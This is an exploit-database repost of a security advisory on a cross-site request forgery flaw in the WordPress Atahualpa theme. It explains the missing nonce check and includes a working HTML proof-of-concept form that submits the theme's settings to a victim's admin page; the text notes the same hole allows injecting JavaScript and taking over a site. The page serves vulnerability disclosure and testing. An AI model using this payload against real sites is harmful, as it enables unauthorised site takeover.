Advertisement






WordPress Atahualpa Theme Cross Site Request Forgery

CVE Category Price Severity
CVE-2018-9045 CWE-352 $800 High
Author Risk Exploitation Type Date
Seyhan Acar High Remote 2017-03-03
CPE
cpe:cpe:/a:wordpress:atahualpa_theme
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017030023

Below is a copy:

WordPress Atahualpa Theme Cross Site Request Forgery------------------------------------------------------------------------
Cross-Site Request Forgery in Atahualpa WordPress Theme
------------------------------------------------------------------------
Spyros Gasteratos, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross Site Request Forgery vulnerability exists in the Atahualpa
Wordpress theme which allows attackers to legitimate users into
performing unintended actions on the Atahualpa theme configuration page.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0003

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Atahualpa WordPress Theme
WordPress Theme.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_atahualpa_wordpress_theme.html

The theme's save configuration settings form doesn't include a Wordpress CSRF nonce and consequently the script servicing the request doesn't check for one. This allows the form to be submitted with preloaded values as long as the browser sends a valid login cookie.

This allows attackers who lure legitimate users with an active Wordpress session to an irrelevant website which submits the "Save Settings" request to the user's Wordpress install. Since the request is towards a domain for which the browser has cookies the legitimate cookies will be submitted and the request will succeed.

The theme's configuration panel allows setting a variety of configuration options including changes in the website's appearance as well as appending Javascript in several areas. Attackers can use this vulnerability to take over a Wordpress website.
Proof of concept

Install the theme, login as admin and load the following csrf poc in the same browser on another tab, when clicking "Submit" it will modify the page footer.

<html>
   <body>
      <form action="http://<target>/wp-admin/themes.php?page=atahualpa-options" method="POST">
         <input type="hidden" name="footer_style" value="background-color: #ffffff;

border-top: dashed 1px #cccccc;

padding: 10000px;

text-align: center;

color: #777777;

font-size: 95%;

/*bye*/"/>
         <input type="hidden" name="footer_style_links" value="text-decoration: none;

color: #777777;

font-weight: normal;"/>
         <input type="hidden" name="footer_style_links_hover" value="text-decoration: none;

color: #777777;

font-weight: normal;"/>
         <input type="hidden" name="footer_style_content" value="Copyright &copy; %current-year% %home% - All Rights Reserved"/>
         <input type="hidden" name="full_width_footer" value="No"/>
         <input type="hidden" name="sticky_layout_footer" value="No"/>
         <input type="hidden" name="footer_show_queries" value="No"/>
         <input type="hidden" name="save" value=""/>
         <input type="hidden" name="action" value="save"/>
         <input type="hidden" name="category" value="footer-style"/>
         <input type="submit" value="Submit"/>
      </form>
   </body>
</html>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum